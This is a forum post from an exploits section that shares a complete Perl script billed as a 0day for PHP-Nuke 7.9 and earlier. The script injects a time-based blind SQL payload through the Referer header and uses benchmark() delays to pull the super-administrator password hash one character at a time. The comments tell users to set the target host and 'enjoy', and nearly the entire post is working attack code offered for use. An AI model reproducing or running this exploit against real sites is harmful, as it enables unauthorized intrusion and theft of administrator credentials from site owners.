Jump to content
Ras

Exploit 4 PhpNuke 0day

By Ras, in Exploituri

Recommended Posts

Ras Newbie

Ras

Posted
Posted 
#!/usr/bin/perl

#0day exploit for PHP-nuke <=7.9 maybe other version (Ex. 8.0)

#By Rossi46GO [url]www.hackingz0ne.altervista.org[/url]

#Chiudere tutti i programmi che possono occupare banda
#kill all the programs that can slow down the connection

#Modificare la variabile HOST e divertitevi
#modify the variable HOST and enjoy

use strict;
use warnings;
use LWP;
use Time::HiRes;
use IO::Socket;


my $host = "http://127.0.0.1/index.php";

my $useragent = LWP::UserAgent->new;
my $metodo = HTTP::Request->new(GET => $host);

my $referer;
my $inizio;
my $risposta;
my $fine;
my $tempodefault;
my $tempo;
my $i;
my $j;
my $hash;
my @array;

@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);


$referer="http://www.avantolazio.com";
$tempodefault=richiesta($referer);
$hash="";


#QUERY RISULTANTE
#INSERT INTO nuke_referer VALUES (NULL, 'http://www.hackingz0ne.altervista.org'+(SELECT IF((ASCII(SUBSTRING(`pwd`,1,1))=102),benchmark(200000000,CHAR(0)),'falso') FROM nuke_authors WHERE `radminsuper`=1)+'')/*')

for ($i=1;$i<33;$i++)
   {
   for ($j=0;$j<16;$j++)
   {
      $referer="http://www.avantilazio.com'+(SELECT IF((ASCII(SUBSTRING(`pwd`,".$i.",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),'falso') FROM nuke_authors WHERE `radminsuper`=1)+'')/*";
      $tempo=richiesta($referer);
      aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
      if($tempo>9)
      {
         $tempo=richiesta($referer);
         aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
         if($tempo>9)
         {
            $hash .=chr($array[$j]);
            aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
            $j=200;
         }
      }

   }
   if($i==1)
   {
      if($hash eq "")
      {
         $i=200;
         print "Attacco Fallito Sito Fixato\n";
      }
   }
}


   print "Attacco Terminato\n\n";

system("pause");


sub richiesta{
   $referer=$_[0];
   $metodo->referrer($referer);
   $inizio=Time::HiRes::time();
   $risposta=$useragent->request($metodo);
   $risposta->is_success or die "$host : ",$risposta->message,"\n";
   $fine=Time::HiRes::time();
   $tempo=$fine-$inizio;
   return $tempo
}

sub aggiorna{
   system("cls");
   @array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
   print "Exploit Php-Nuke <=7.9 By Rossi46GO maybe other version (Ex. 8.0)
Thx KingOfSka\n";
   print "Visit www.Hackingz0ne.altervista.org\n\n";
   print "Sito Vittima : " . $_[0] . "\n";
   print "Tempo Default : " . $_[1] . " secondi\n";
   print "Bruteforcing Hash : " . chr($array[$_[2]]) . "\n";
   print "Bruteforcing n carattere Hash : " . $_[5] . "\n";
   print "Tempo sql : " . $_[4] . " secondi\n";
   print "Hash : " . $_[3] . "\n";
}

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...